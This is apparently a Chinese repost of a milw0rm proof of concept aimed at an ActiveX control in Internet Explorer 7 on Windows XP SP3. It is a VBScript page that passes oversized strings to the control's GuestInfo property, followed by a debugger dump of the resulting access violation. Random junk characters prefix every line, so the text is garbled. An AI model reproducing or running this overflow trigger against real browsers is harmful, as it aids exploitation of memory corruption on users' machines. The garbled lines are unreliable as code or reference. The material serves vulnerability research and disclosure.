原文来自
http://www.milw0rm.com/ :ws<-Qy ]SEZaT 测试环境Windows XP Professional SP3+所有补丁,Internet Explorer 7 下
.%-8 t{dt -------------------------------------------------- ---------------------------
DlJo^|5 <object classid='clsid:38DB77F9-058D-4955-98AA-4A9F3B6A5B06' id='test'></object>
|7~<Is~* "dlVk~ <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
=_^X3z0 {;oPLr+Z <script language='vbscript'>
iy"*5<;*DD Sub tryMe
2an f$^[ buff_1 = String (2000, "a")
,,r>,Xq6 buff_2 = String (2000, "b")
FI.\%x test.GuestInfo (buff_1) = buff_2
dr"1s-D4IQ End Sub
VU#7%ufu& </script>
1;iUWU1@ p<%d2@lp Dump:
SrJE_~i 09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance)
,: ^u-b| ----------------------------------------------------------------
|BYRe1l6l Exception C0000005 (ACCESS_VIOLATION reading [00000070])
HKe K<V ----------------------------------------------------------------
VaPG-n>Vf EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
{G-kNU EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
8EY:tzw ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
P
{'b:C EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
2qp#N% ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
=M-p/uB] EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
Mihg: ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
Ho%CDz
z EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62
Ss`LLq0LO EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90
#;<Y[hR{P --> MOV EDX,[ECX+70]
"5
A!jq ----------------------------------------------------------------
uq{beC liSmjsk 09:25:39.339 pid=0640 tid=0504 EXCEPTION (unhandled)
Uz7<PLxd ----------------------------------------------------------------
*`U~?q} Exception C0000005 (ACCESS_VIOLATION reading [00000070])
UI#h&j5pW ----------------------------------------------------------------
ix$bRdl EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
.u:GjL'$ EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
7L??ae ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
SdWV3 EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
"fI6Cpc ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
TN.rrop`#g EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
Y}/-C3) ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
]q.0!lh+WL EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62
Jvi#) EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90
g :OI --> MOV EDX,[ECX+70]
?(PKeq6 ----------------------------------------------------------------